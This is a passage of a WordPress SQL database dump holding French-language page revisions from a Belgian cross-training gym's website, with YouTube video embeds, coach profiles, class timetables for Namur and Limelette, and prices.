(373, 1, '2013-11-01 09:22:53', '2013-11-01 09:22:53', '<h1>Retrouvez ici les vidéos illustrant le déroulement des séances.</h1>\r\n&nbsp;\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3>Présentation du Cross Training Namur<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n<td>\r\n<h3>Ouverture du Cross Training Limelette<iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:22:53', '2013-11-01 09:22:53', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(372, 1, '2013-11-01 09:22:14', '2013-11-01 09:22:14', '<h1>Retrouvez ici les vidéos illustrant le déroulement des séances.</h1>\r\n&nbsp;\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td align=\"center\">\r\n<h3>Présentation du Cross Training Namur<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n<td align=\"center\">\r\n<h3>Ouverture du Cross Training Limelette<iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:22:14', '2013-11-01 09:22:14', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(378, 1, '2013-11-01 09:29:06', '2013-11-01 09:29:06', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\nPrésentation du Cross Training Namur\r\n\r\n<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\nOuverture du Cross Training Limelette\r\n\r\n<iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div></td>\r\n</tr>\r\n</table>\r\n\r\n', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:29:06', '2013-11-01 09:29:06', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(375, 1, '2013-11-01 09:26:03', '2013-11-01 09:26:03', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</table>\r\n\r\n<h1>Retrouvez ici les vidéos illustrant le déroulement des séances.</h1>\r\n&nbsp;\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3><iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n<td>\r\n<h3><iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:26:03', '2013-11-01 09:26:03', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(377, 1, '2013-11-01 09:27:37', '2013-11-01 09:27:37', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\n<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</table>\r\n\r\n<h1>Retrouvez ici les vidéos illustrant le déroulement des séances.</h1>\r\n&nbsp;\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3></h3>\r\n</td>\r\n<td>\r\n<h3><iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:27:37', '2013-11-01 09:27:37', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(376, 1, '2013-11-01 09:26:59', '2013-11-01 09:26:59', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</table>\r\n\r\n<h1>Retrouvez ici les vidéos illustrant le déroulement des séances.</h1>\r\n&nbsp;\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3><iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n<td>\r\n<h3><iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:26:59', '2013-11-01 09:26:59', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(379, 1, '2013-11-01 09:30:06', '2013-11-01 09:30:06', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\n<div align=\"center\">\r\n\r\nPrésentation du Cross Training Namur\r\n\r\n<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div>\r\n\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\nOuverture du Cross Training Limelette\r\n\r\n<iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div></td>\r\n</tr>\r\n</table>\r\n', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:30:06', '2013-11-01 09:30:06', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(380, 1, '2013-11-01 09:30:28', '2013-11-01 09:30:28', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\n<div align=\"center\">\r\n\r\nPrésentation du Cross Training Namur\r\n\r\n<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div>\r\n\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\n<div align=\"center\">\r\n\r\nOuverture du Cross Training Limelette\r\n\r\n<iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div>\r\n\r\n</div></td>\r\n</tr>\r\n</table>', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:30:28', '2013-11-01 09:30:28', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(382, 1, '2013-11-03 08:54:06', '2013-11-03 08:54:06', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-03 08:54:06', '2013-11-03 08:54:06', '', 11, 'http://www2.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(383, 1, '2013-11-03 08:54:51', '2013-11-03 08:54:51', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"tglfe\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'publish', 'closed', 'open', '', 'les-seances-limelette', '', '', '2013-11-04 17:07:51', '2013-11-04 17:07:51', '', 0, 'http://www2.crosstrainingcenter.be/?page_id=383', 0, 'page', '', 0),
(455, 1, '2013-11-04 17:07:51', '2013-11-04 17:07:51', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"tglfe\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '383-revision-v1', '', '', '2013-11-04 17:07:51', '2013-11-04 17:07:51', '', 383, 'http://www2.crosstrainingcenter.be/383-revision-v1/', 0, 'revision', '', 0),
(384, 1, '2013-11-03 08:54:51', '2013-11-03 08:54:51', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td 